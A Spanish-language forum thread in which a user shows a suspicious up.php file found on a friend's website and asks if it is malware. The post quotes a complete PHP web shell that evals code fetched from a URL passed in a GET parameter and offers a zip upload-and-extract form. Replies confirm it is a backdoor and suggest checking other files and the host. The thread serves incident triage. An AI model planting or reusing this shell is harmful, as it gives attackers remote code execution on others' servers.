Ayuda este código es para inyectar o infectar web? apareció en un archivo up.php

• Autor Autor zoom
  • Fecha de inicio Fecha de inicio
Z

zoom

Préstamo
Beta
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Pues resulta que estaba ayudando le a un amigo a solucionar un problema en su web y me encontré con este código que estaba dentro de un archivo php llamado up.php y se me hizo muy sospechoso ya que este archivo no esta y de pronto apareció.

Y si no mal recuerdo esto se usa para infectar web, así como para subir una shell o algo, si me equivoco podrian corregirme por favor. Este código apareció hoy por la mañana y según otro amigo de la universidad le estaba solucionando los problemas en la web.

Este ss el codigo en cuestion:
Insertar CODE, HTML o PHP:
<?php 
echo "<!--LainCest Returned-->"; eval(@file_get_contents(@$_GET["ayaz"])); 
echo '<b>Sw Bilgi<br><br>'.php_uname().'<br> Y眉kleyece臒iniz Dosya .zip Olaml谋d谋r.</b> // SpyHatz'; 
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; 
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; 
if( $_POST['_upl'] == "Upload" ) { 
$file = $_FILES['file']['name']; 
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { 
$zip = new ZipArchive; 
if ($zip->open($file) === TRUE) { 
    $zip->extractTo('./'); 
    $zip->close(); 
echo 'Yükleme Başarılı'; 
} else { 
echo 'Yüklendi Ancak Çıkarma Başarısız.'; 
}     
}else{  
echo '<b>Basarisiz</b><br><br>';  
} 
} 
?>

Esto sale al ejecutar el archivo up.php, ahora si estoy seguro que le querian clar algo a la web de mi amigo
cc2f6ee817264957b25794494d53d880.png

Última edición:
si permite ejecutar comandos directamente al servidor (con el eval) y subir archivos al server

si permite ejecutar comandos directamente al servidor (con el eval) y subir archivos al server

de lo que se salvo mi amigo jeje, ahora tocara preguntarle al otro que estaba manipulando la web ya que esto pudo haber terminado en trajedia.

gracias por confirmar

Deberían revisar si otros archivos no fueron modificados por si tienen un backdoor.

Saludos.

Si aparece y desaparece, verifica el hosting.

Atrás